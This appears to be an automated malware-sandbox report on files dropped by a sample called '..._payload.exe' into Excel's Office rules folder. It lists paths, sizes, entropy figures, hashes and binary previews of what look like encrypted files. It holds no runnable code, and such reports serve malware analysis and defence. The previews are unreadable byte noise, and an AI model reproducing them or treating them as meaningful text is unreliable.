                                                                                                                          Preview:<?xml...gk$..#..t....P..BG6......./KL_8.$...l..w........B_=.S....X.#.:..Z..0.{.W.*0...-..T........<...h('E.=..$5 .......J%.j.5.S~.rkf.........SQ....D....{...w...oBk.1(<...A.....~..*....<...(..WMX\.KG....?!...W.;}...'.....0..R.q..\O.h.L.@.l...P.;.<....go.F.....g...#....V(..b..B}!...l#E.a^P.K...GN.H...E...]N.....Yk O.n.....,....%....K....i.$l....2P..o[Vu.i.m%.6*0..].0..?.=..D....j.?.../6....nj...v...U..q...R.b...G...`..y........x.......|:.....].[...(...jj|....U.......p.b.v.....l../ML....w..8.c..i...9_A.y.g....U.........7pO?.,/.r"..f..F)...:...W..^ugj.....HZP2cn.2...^.........(.....M.9y..x....|#W..1<....x .I.?;7....d..cphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120670v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):805
                                                                                                                          Entropy (8bit):7.730306538261705
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ec09IjAIz7cjcoXvr43F1szZOVIxj7GbD:e9/UToD8cZO4ED
                                                                                                                          MD5:3505497655933EF899108B6D105259C5
                                                                                                                          SHA1:DAC8305851ED9D4208E78D59DCEE958C040DC8BA
                                                                                                                          SHA-256:D5A120EB44B3E2096744131BCEE702EF88C6D8362D3580466DFDFB2EE17962F7
                                                                                                                          SHA-512:B51467E522A331A952BDC67A8D5B04BF414C50B00D629F33B9BCD3DB8AD09D0A4D34389619E5AC95BD84A420742486B7C24B5D06EDEDE0D2611AB43A5CDF6DEA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml......[.....Y.J.'...t..KYg.W.W.3...7.1^x.=...0m...)y@...L...i....a...Q[.L.h.SLx.p.0.Z....E...p........F.....8Tv..PM~X.......K.Wa2..b"&$ ..u...;..B........W....gZ.....L.....f.A.o,..$.T62.k...r.e..=!e..u....X.W.o.~.;..A...+..:,^.Z........._.J.:M.ytW>C.d..}S..;...E.jV=G...N...o.......^a...8.Z..D..M.)....N].#..N....vs.B..C.....+.w.b.T].[.x.96..4..^Cx....d..qE:$..R.....@6.k..h.o..!./.+j.SIsXT. $....j..KvS.1.....C'G.._W.v...j....p.......Yu....BU.(.....s(0@~.X.2.&|....n{.y..).}...40.P...S..o.e....T#....o{m6.%....0/~..p@.0z.._..Ye ..L....^s,...yh........T.@J...@.....Y..e.f...'.i.[0.o......~...F...2$+.J .....Y.1=HY...P..Gk.,;!y....:...|..Y.%B&`........n.O.J..K.........&;q.....&..F..n.....NHphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120671v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):765
                                                                                                                          Entropy (8bit):7.691965474735595
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:Hs5nZf0tpMWhMiw/YrvUBP0oh0GgdML/wk0DjWyFvUmv9F83sHhNz3RMby9V5q53:Hs5nZK6/EvUBc60Gg2LYDCyFb78cBNz6
                                                                                                                          MD5:9829F4F1018A2B3B5057E776F21EBFBB
                                                                                                                          SHA1:436C7972C532CB2C963159A52A8451095D03DA23
                                                                                                                          SHA-256:8A24A332019F4848436F9837AA6330664CA50F9C42656C4EE0767F4FAA6CD804
                                                                                                                          SHA-512:243ABC793F61D1997E4A85A6770F12A4F49066A3ED8B58BB45FA31566DF1508D1F4C6283A9C384669AAFBF2924DB3C772857339A29195090D95CB96F549980F0
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml'...."...jxG.j.5..Z...D....YAe....?...g6."o.y&K..|...._..["!.i.[...$.Qv+...=...Sy.:=D~..."...-..<..t.qvq..z.O.....HQ....$D.2...."..b_...)8............-.{K.J......c.|....e@.+.......;[.Lzp..Q...Z!\.K-..~v.....wc....ga..%..'.rT....=.$LMZ.....O.l...<0.a....h..e9a..$K...<,...."...!..Q@H.=@.!.;'[.4....P_.,e..C...e\.=.x.p...e..:.}H.Ti..P.b%.D@..v..X...x..D.T...x..~..AG....w..0...N.......-4[o....w........Uh.M..{W.2...y..% ....f.o.7... Q...W%.~...B.;......:.^.>7.%.E;....K.q.g..,z.Q>..........0R.G!..c|f.*.43H.u.)C..p.. ..~.~e..U!.jFu.V..H...Z.y.........9.....?de.y...M.C..[..O...`U.#...E..4...y..,+../.P.....j|.0,.>J.".e}^....+.3...._.V.q.?..MAYPh.t&.....R.I^.&phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120672v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):808
                                                                                                                          Entropy (8bit):7.7145911617075
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:u3dwtrrPQmT8wU+JDsTGkLLZkpPSE3tIigbDWUbD:uWrDsTGkHaFDwbDW+D
                                                                                                                          MD5:B8EACE4E891CD3FD9510F9C09D63707B
                                                                                                                          SHA1:092BAD6F6A9E34533D955048E00667C1F5F9B293
                                                                                                                          SHA-256:333302DC9EE2B4A497EF813834AB3D33E549FC6D801D2EA111D1AAF6D81987A3
                                                                                                                          SHA-512:B6C9608F2FDCD0A55EE3C339666DB7E820B0682B7A9A897C462CA1DF434B3F81E84A031EDECF86E8DD5F87D24C3D1131C5FCEB33E27A3724DC2C6FF0B17E9A2C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlG [B....Q.K...@=.5_........N?.<V...L........Am.......S...i..qfx./.}....^...B.wCs.*..W....+.U]q....5b..~..jo..F?a^e....z.Wn....?..d.H.V.<....K........o0..h...=.E...e4._.j...6.x..#.Ki....x....>..c.ew!.-.Q.....7.'.;.7.Q...?.k9......*M.y|.........'(.Wq.5.u...\.0w}_D.A.\.. i..N..{.M.;..)I...m....wLKO..3...~N~.*..r..."%..s.=n.2.v.K...78.....>2.v.-1.].8..r....[.90.t....r=.......b....=..Ne.}...t.'..d.-P...){...YZ....S...4...Vd...O..8.V...D.~Q.\#... ......(..YNO.l.....yEA....O......g..8...pB.;.aN4~.D!.Q.:.E......J.I[K..U,..{..!....I/....p".........D.....R..P.....<P..S..\c...A.........^.{...:+Y.k...;...X.~..:....L{9...P...)u......1..rMW3.x.W.N.@..7...+......\,.*.T..{.....5n.n..'.F..r....HN...... phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120673v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):760
                                                                                                                          Entropy (8bit):7.712976488944568
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:erfL7xfuoUYyfjuE5Zcnq3sHnDeUbnFKyeyUqL/cW7sZK3yWojmcS5DULq5bTciD:gfZmqyrDcnq3KDeUkfyzLUW7sZKkjjkR
                                                                                                                          MD5:0B035A7BC6570A67E8364146BF82CC21
                                                                                                                          SHA1:9566426A71BB7CC0B78CF78E872566137A162E65
                                                                                                                          SHA-256:3264EDAC4674D17CE4C5FEB814AC429189BBB711E4C4E828C031924F593ADB40
                                                                                                                          SHA-512:EF55787102A25542ADC037B42A164502D9468D2AAE18F1F26F1C511DDE636FE687E2390FFC72D1143544A65184911EAA96FD83906F0D5F8C0DB48652BE959CC1
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...S..v6.`.......P..}1..o.f..Na....s.`.....X....Pha<.;....y...<Y..mhx...X..DC-..i&l.....Eq.&..P.....5.u.92LX..$.k.../y?.NE....7].....Za.j..S.\.c..8k@Kz&.HM....9...D.N.3O..(f.m.s..M...5...0..f..e!{CKl8...8,.!.u@r..jkz.V._. .\.v.....))&B..#y.8.^U...q'7..zl.C..*..s.&|......r1..Wn....w...+z.2...D..@.t...l..\.vW..~..&?K.fM..)..sTZ...n..L>d.......b....>8..<.~B..UH....Pz...<...-.e6;d..q. m.......iC-;]..<.{l.CR.>'.`..~.........3]U:.41...W...@"p.L....O..&..}....V.z.?..T.....(o...n ...9wU..6....d.."....z1..1^...=.,..Sb.....{|...)p..F.lA..(w..r.....t..jN.Zs7.yD~....C..pn.....D.m...b.H.g.t...$.,.r..@..e.Y...,.B..e.iM..j.T9.*..K.ne7m{..%....h.B.jphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120674v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):807
                                                                                                                          Entropy (8bit):7.720446154414555
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:Gb2zUriSoMrPhiLLxCX5vSM1Nw82rrbJSKnL1565o2kw3wi8V9c06yAyq5bTciik:GESbcv6Ajdf7nj2+wgDVm0NAXbD
                                                                                                                          MD5:D2299F1C94ABED34E5A1D18903EDF615
                                                                                                                          SHA1:1F0B7DB6925A09DDE633849B71FC1066F4246A53
                                                                                                                          SHA-256:0188B5660D8487E0640FF68C5A63FD3B04B15D197D593ED1553366120501501B
                                                                                                                          SHA-512:F581E0FC1CF724E7DB2B5966463CE7DD1B266577016C2DF2D461C16FD69FCA0147CF0119560111035BD0E1E3BB148490C7DA4F571D75A53752A090DFA824D0AF
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml;......C..A.M77.Vb..$-...h.[...p..B..[...!.3...8....W.....!+fa.O....a..g.aA*r...../....F.%....N.C.Z.Z`..j..0.Z.i......*)65.......`..'o...U7..f.<.uV}...7......N)o.,..~.I~..?0....".[.@8.y'P.K.Y.....k....%,Rw`.;.DRQi@.7=..+D.m..}.yq.fug.I..J......7....]/..$..!......q.7..m.b.E.n...K...Q.=w}.&K.).......Q.mO.c....Aa5.m5.q6%..u.8.X...*hO.Q..X4.2....R.......4!.5.}'.m4..p....)LKY......;.}k..U.......`:..3s..}.-1.M.........&}.)....)...E.......w\>..J...^...=.P.y.+M....(j(......b...`.T1h....yh.L..\.>.7.....e.I.F...Iy...Jp...C...0..<..;L.....1.M.._...MG...]......+.M.....L.Y.u+@.......(..v...^..J.hA..i......23.Z..>.'.nf].......%..8m.p..*..-?.J6..2.Js'../.(.9[G.6.}J....N.....qA.....m..'_.P.7.KT]o.........phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120675v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):752
                                                                                                                          Entropy (8bit):7.692977273457155
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:5u0nRS2uluhk7FoXkfeGcmUHV7YzkIdvZYhseGjWKbTFlPm35tfihrVjzq5bTciD:3HP+FykmV7DyZW/0WKHPm3/aRibD
                                                                                                                          MD5:9D76C1B0EABF36FF6E3F8A03FAD88870
                                                                                                                          SHA1:12926DFC668ADC21ABA11461C5B7A08CBE87A03B
                                                                                                                          SHA-256:9E61FB6493A2146F6F0055C8863D391F791D114897C01571408B4355CC58B233
                                                                                                                          SHA-512:E2FBFC4B4349B064521B85266CCD6D436E6711E291F11661A47FAFA4F7DA6995EA58623B52431A518343B90DAFCAB977512E411473B87F3AEED7ACFD56E8FA5C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml$}....;./MK...t\..H..$...d.7.{.i+.;...VLy.i|._|.....v..[}.._........<6....C\..l..|.G......L.a..d.xU'.%l..p.q`.....B.p.q-..>.........\..v...o.h........"8.\..7......9....E}...\.b..V.....CMs....2.....oQ#...H...M.f.."Q..f.I.!.Z..<u...%v....Uf..Y..T........T....X.{v..H.'- .&....o."...<aI._[.5Q./...j6.......r.A.......TV+s4.S..BA@&.p..q}n}...&.eV~...".T(.-...[....*j....[tr$K.h_.R..3..J. .H...ZkIK.A.o.o..}."(..N..L!.n.[....k..C....../..........V.F.........V..<....:..-.....)...).:..C.V.#1.~..q..|,...4.B.....5.A..}......O)..,H..T...y..}W ...oQyP."..D.F)ogr..S.....!.\..Z..J.W...@.....-...>..^.#.F..C.u.q...i. .\.|2.F.$.,......=.F...P..S.qphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120676v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):805
                                                                                                                          Entropy (8bit):7.743718555621482
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:izgUyIXFrQpReSehE9I317iODFmAU5bxZZtbxs3nq5MsFgUF+K5oSwq5bTcii9a:izgUyIX95h531OSYAKz2qOs6Ud5zbD
                                                                                                                          MD5:654334F33EF13F56AF49BF8043E25559
                                                                                                                          SHA1:3212BDBA8617930BA0AFF3D56A7105E9B55F0AFD
                                                                                                                          SHA-256:7ADD85DAA1AEC2FA23631A6F78666E5043FBFA1655245E8FA219DBCD7491764B
                                                                                                                          SHA-512:C44728FBE716F6D9CC4CA31E30156A582D611DB31CF44809C44641216AB2B1896C2F0E016C28B30266D87D02F83A59D10C9F7B918CB00EBB489A3985F0238EE0
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.9!NZ..R..5.N ..>..N.)."t............y......|Q.W.......`yic..&_K.8R.....NO.sC..J...W.=..>.|...{4.[....!...[..".....]..Z<. ..U..5..........g.I..N.hD....{../....'p>....=.dH.[..KQ>(a...2..[z.._5.'.i.W...1.>..9b7_....L.#U..Gu...!..D....>~..Y~.VwML.O...m.......tS..#....y=+...P..1u.h.<R.e.i..,.~lO.?...........7......yX..h...%./^X....9.x..%.....S~.9.+.F.p3.`d:..>X0=.......z.^.7.)..i....=|Zm..).$..... ..T ....I.v.h..x4./_..I..L..OK..Ps].....~.9T.A#..re71.....u..J.+..=....&"cz.}......#.M...)..:....:......:b8M..i..|..r.r.A........\....K.?P.%.,.*.......Np^.?...,.0..4k........8wI.9..7.T..%nX.......E.D2..c.{.E1H....d..\.1X...`..g'.#u..5N".J:.....w${.-....\pWA.r..k...5J.!&.2`.F.\(.....,3e..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120677v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):738
                                                                                                                          Entropy (8bit):7.723792503474117
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:4DqMe43uxeh7wH0Sg5rQgXXWIkUmZdJpi6/DDzmQ3qGuMkD29Lrzq5bTcii9a:L43vh7wUr5sWXw/Z53msBI29qbD
                                                                                                                          MD5:999FED8B6B89AD23245EE53A3475DC6C
                                                                                                                          SHA1:00936B208D922AF83D018E864FF563C436871953
                                                                                                                          SHA-256:A7DCF322FA879EDFD9A2F3A53431238249F6D26563CA30010DD248151117DFB1
                                                                                                                          SHA-512:4AB5BB990CA371F576DE3510639ABA77C1AEB16E19E66B2D7157F715C30C463B0BC5F5D57C0DEC94FB8679C204D7255B71FD7B7596D389B97B6F79FC282628AA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml:t.@N.#...K.?..Y...%T......!a..Q.#M.k.N.j.2...F....F.pNY..i...K..W.......N.&>;..4..].`c<\.3...I5X...m.th.L.\......?..O....._..P+...uV.~......$. .oo.K..?v'2../A..}._JzN....u....{w.>(v..uO.].."....8Z.S../.M..).<..p.q.>.....K.....l..r[...E.....2......K....y7Si.h..'...C.K...<...|..U@>[..S.?n*...`.K...........{.c. [..6se..&mh.C...;=.;.'%..N.....c..#^.l....'.H+]..}....G.c.[...E?.J#.....K?.....k....-{......KS...............A./.l..y/@.....C..M0.....Q...4...v.D..!.z6..,.)...-..2..o,..}.d.....B...).Ti)<..3.o.....ifv...F...-.Ui...}..R-F.tsx.6....pf....ioBG.fZB.^.j......7.....G......aq.......z.o.Y..J.o7..o.. ...$.b/.....f[phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120678v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):801
                                                                                                                          Entropy (8bit):7.7645650019506665
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:gY1Bu+eaXmNUAymb+3fnl09RZzofUtbv6LpgbMb6TbD:gY1BrcUOy3vS7Nofg6lgba6HD
                                                                                                                          MD5:7A67739A6100655CB758EB42C5B41DE4
                                                                                                                          SHA1:8AE4761C78CD2BC65C339120DC9AA54A4A43F7E0
                                                                                                                          SHA-256:9358B040DD714363CCBAA984924A5A17B5E7A304D549440FB73F4673F3B10664
                                                                                                                          SHA-512:C57D5DA09CB8F0BA7AD2F51EDD8FAA36114D820BE3C24D73D7DD412F458A10C76B2ADF9CA28AFB8E784489E58B8FB0136ECDACF09612BC40E2C6B438D5D4D851
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..a.......t..p.s .....}.aq..y.yI.m..y.......07.*70.`.^..S..E..R..R{.TA~s.....r ."...{.M<s.W.}...elkK...[.{.....x.!.[..x..Q@./{k...4.2$.b....r~Ks#..&......h..kcB...M....M.*.)?5 ..7`T.p.H..S....|ZS$Z....|3R...w~&.h.?8a...@.N.c.!.F..3......e....~..r.3o\.t._....4......>gd.v.|.Y....b.A..J|..G....4..y....=2.Xv......wX %..................:.t..[.=..T.....cWr>4....o.`...#...Qsi.]...........CN...^...A..dQZ...bH...OS.l.p..6....9C".)...z@.1i9.}......\ !p.Y..W.Z......Z..4f...*....D..(.`'.xI....(!.y.0...[.d.FG4........@bpn......%co.zG.q|I...Cyj.E.....6x>...D.S|...6M.-B....7..$...{.....i.brMa.....q-^.`.B.@.\...0.+......7.......bp.R....U.\..e. .r-.e{;.....8p.o..$.Dc. $.....,8.%.OphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120679v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):507
                                                                                                                          Entropy (8bit):7.51922270176298
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:Y+Bzg4cbXZoZxIQ5Ol32d9eJDenHJLaaOa0S+jTq5bTcii9a:Yn1bXZAMmd9et0HJaBpS+KbD
                                                                                                                          MD5:883A0C5E65186A805EB1F18861A188B3
                                                                                                                          SHA1:5E5AF536C2C0B45721B98FB474E53A650EEA93E4
                                                                                                                          SHA-256:D4F10D34A9A7C26C9431DFF61E535A6A05C90E05B1F10B42EA449B787ED0A200
                                                                                                                          SHA-512:7C5719421CC529159AD63EB6A97A8BFDD04A8EC8AE8BB88AB9D7C931A452066645D29C48F0CF23744FC21CE46EDC1B37F5A96C23E1A24C3341FA82B797033F57
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...D..DC...X..a..^.zW5.. (...G/H/....~l..r.:.g.`.4c...-........x.=...U.CG..>...h~F.........%[..[..U....;%.G.AH..I.D9.Kh.e...vmo.'........x}.GbpmA.>...Ds..Z~4t(.Ly.....n...T...5."....;;.I. .B.W.(2..`z....S-.p.6..._.ME...n..<&n+.....1.{k."L.$~r..4$....Z"..-.....j...Y...6.6..P.....l...5Xn.........r..7...=..$.5Qs.(.I.Z....u.cb.je.G..w...6Q.|.g..~..#n.IN{>..-z....~...e..ZF*.z...ZPbh..k....*u.......b.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120680v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2285
                                                                                                                          Entropy (8bit):7.918628763989256
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:vCuMvQ3m0haj+oiLZo62KcdVQKTSELluzB/V8rOYCEJ7h1ywcyWAL5+D:vesm08j+J1oUsnSELluzB/Vs5Xywgw5G
                                                                                                                          MD5:3F09D2FD617038C0374AD7AFAF4D4953
                                                                                                                          SHA1:703260985826F5628943792D2632D2327B56DC94
                                                                                                                          SHA-256:B93F5FA04971825A9A54D7C9109580B06E200472AE25B4EC74281A71B73CD1F5
                                                                                                                          SHA-512:0C0664B6B05BCF138D42753B9A69EEE72DA6914EEDBC07CF9834F1EF4B6BF98EE648E4D5DF55165F7C1D8707635E8ADCD2AD0462467BCBC4BA3F0F6D8320BCF5
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..^.A.q.....L...8....\..B...y#...}.}.u_.........]p.F..L-PP..T.(........$ji....!...CM......\...X.....55%$..nI...../.W_b...[.6...j4.@..cm...6.....f..7....t..tg........./...F......B.%[..4..^.n.<!(7.^.R...-.*...0._0.\3.J.d.G.h`3....6...r.../....^I..R]ZB....5.w.q....q....o..6.J9..;.<.K....z~H...\fHqJ....I....N..|.I.T.(6.../{...........9NJ......'.>...u.r..s..0.u..H./..T,]...m4.....C.OymT....].....E.L........(._.SW.Z.......F...M..M.Ud.V....._.?.....p.u.O.jv.8..){.o..d..ta.q.\KD....b..gK...Y.h...CM.....F...0]~..Lz0q...ajw.s..a,.R{.!..........x.h.t:+.8..PV..#.8.l.!.V.3.r..U...Jw))i...f.e..>...D...M.....U.....W.@Q\.p8....c..........U.vCQH.,Y.S8S...X.......@.V....l{....'K....V.1Sn5.C..ca]2T..'.qI....k.ln...JaqL.)..y...>.z.P$v.!............B`VP..(D.{..z.....1R..0...lb...s..a..'r.\.X...S_b..D.....K.3..8....'..2.....tf<...& jU..$.V..m../.....(.....O..yu.`7.=...;$5.'....}4.....}..q}8*.t.....1D'.x.x*0C... #+.......K.l...]....vN.>.kc....4./.j...?...,...t..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120681v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1291
                                                                                                                          Entropy (8bit):7.846168798695799
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:df/2Af0yg3pXEl3vS4UwVDnOSFeI5t6woMq4uNBeW8gY+EabLDo2UEbD:df/2Afi3HwVTFMMJoMx6zgOD
                                                                                                                          MD5:514EDD0178285014D43FA94308CF9338
                                                                                                                          SHA1:2EE577C8526052A550D6B305C04AC7E705D27B43
                                                                                                                          SHA-256:E8049042C166472244F9292B2E0D6EBC7DF71CCA7677A084FFEC1BD81430FD79
                                                                                                                          SHA-512:C60BA89D94443A237EB91C3E0910392C7FE9EFEBD8EC35C518ABFFCAF4869EACAA52D2B1A36C04C5381E628B14B23A4967DD713ED5606DDD3B5ABB7F4DDA7231
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlq.3.}....{.;....y.v#2..1f.....B.,...Z.h.Q..s......V........mO...7..R&..%Zw.N.5..I.~.0../.ZDZ......z...-.C...w.N.8....~.."aCx\ .Kj....@......J.......U.>.:.}S...!......44....<a..M....9m[.:....g.~......=.................m...u2...K.......3....(....b`..5.../...W...e.]...x..a@H=.......=~..].J.Pm.h[.j61.......m..G.."b...!J..1....t.o..e...3....)&F.=*R...Fe.7.W..a;.*...{.....3..6...b..z.Rl?].#(.......?.....f..!....=.)..........P...)T...<.l.. S....YP5.t8..u.2.AF.P..,o.s#F..(2M:....?b.xYE.]L..-*...e..k|..5...8.E.....1...(.;.yb0...&...."2.jH.?...A.2.)(cS...[.......0S.v$I7....Q.+..Vr......i...s.4..z.,D.z....W.5...H..r.......*.}Q_....$......g....Cq.#.i.A..h:.2M.......3N..I...Bx..b....E.H...x.2I...<b/r..=.Il!....q...H.....X.uq.B..R.@......^.....g-...v7..L...~.`...4].@.,h.G.azW>....T. X..J.S-..#.q......A.....~...*..<.t.Q..G..'9....{x.yL...F.Go.;WMb....~I....s.>:..#o..2!(|..\...".D.}?.K..g!.F.Ia.L..+b7...3..`}q..`...G..[Sy....u...%n.=5s~..=..-

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240038v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1088
                                                                                                                          Entropy (8bit):7.823079258642428
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:qytQA+xG+YGO4Fc9UBlxLPdIqGA/Si28lTOox1fv7BVbD:quQAN+9O4SUBrxJGOFTjx1v7DD
                                                                                                                          MD5:6F014BE035FC255BB724E5C82E2FC3A5
                                                                                                                          SHA1:3C7BD7BA604922D3AC0FF38784490AD882C8CE1B
                                                                                                                          SHA-256:0491260309E56F16115E9D3E585C6AF020EE2DBEED10D9C0C832C0CEF7A6BFB1
                                                                                                                          SHA-512:74B8ECD700C711CF7D82E4E1E93F6E750B6D3995A4A9FBD25A6BA88C5418FFCCF8E891B3190C6C6E0E3E21103A496CAE6E0E1391D8B45925EF4B29BF355B9095
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.A.......|d/....-..|../.....w..}X$k..?....l.f.......e......d......Q..:.D .........6..G....'X..##..I..".]..&....iC&../.m..H.J.!..ED..........-...O..+..1.(..dRBr..^...Z....o...G2.k+4...\o........G!.....k&O.+9....|.$x....f:.S{.._.o..w...K.%.4....R..].i..NT.....4n.e......dL8..%....km.`..Yx.Se=.....>..u....ZP...F|...3{.%. .k...O.8.:)`...[...)P.;.#.-.....s...._.4...'....r..Vuu6.'!0G&../xY.q/.o.c.......,3....../F...#.Ffc...~R...F.-..Dzy[>..s.3/I .T._fn.....Er..C..(.....T.xt..OM.c...U.BL.'a._...U..e:.K..n..........X.a. ..g.f.o$9..X.L.....GF{y..`.y.9.....u....0.....}.CB.....6....D.A..KG.+..b..\..._.-..a......}-=..].A....V......^..+.tOf.......).....jI....e...d\...P|...P..l...r.P....].F....Y.Q..q........._..")...P......)s'77.G.]...X....r6...)....}..VU..n.....\...(6.4#*b...V[...S....I...,*.$D..%h../l:x..H....#.[.....y.Gf.1(..>3K..?v2]6.P.....2...=......P...05....].6.q...J%Kh.t...W.M.s...G.7;VP.^....=s.......z.f./b..0..\.B...}8"....p.._..=...-z....]g

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240039v0.xml

                                                                                                                          Download File
